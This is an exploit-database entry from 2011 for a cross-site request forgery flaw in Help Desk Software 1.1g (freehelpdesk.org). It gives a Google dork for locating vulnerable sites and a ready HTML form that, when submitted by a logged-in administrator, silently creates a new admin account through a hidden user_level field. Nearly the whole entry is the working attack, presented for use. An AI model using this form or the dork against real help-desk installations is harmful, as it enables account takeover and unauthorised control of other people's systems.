Help Desk Software 1.1g XSRF (add admin) Vulnerability

2011-08-23T00:00:00
ID 1337DAY-ID-16753
Type zdt
Reporter G13
Modified 2011-08-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Help Request System 1.1g XSRF (add admin)
# Date: 08-23-2011
# Google Dork: "powered by freehelpdesk.org"
# Author: G13
# Software link: http://freehelpdesk.org/
# Version: 1.1g
 
<html>
<body>
<form id="edit" method="post"
action="http://localhost/request/index.php?sub=users&action=store&type=add"
enctype="">
Name: <input class="FormItemTextbox" type="text" name="user_name"
size="35" maxlength="" value=""><br>
Login name:<input class="FormItemTextbox" type="text" name="user_login"
size="20" maxlength="" value=""><br>
Pass:<input class="FormItemTextbox" type="password" id="user_password"
name="user_password" size="20" value=""><br>
Pass confirm:<input class="FormItemTextbox" type="password"
id="user_password_confirm" name="user_password_confirm" size="20"
value=""><br>
<input type="hidden" name="user_level" value="0">
<input class="btn" type="submit" value="Submit" id="submit"
name="submit">
</form>
</body>



#  0day.today [2018-01-03]  #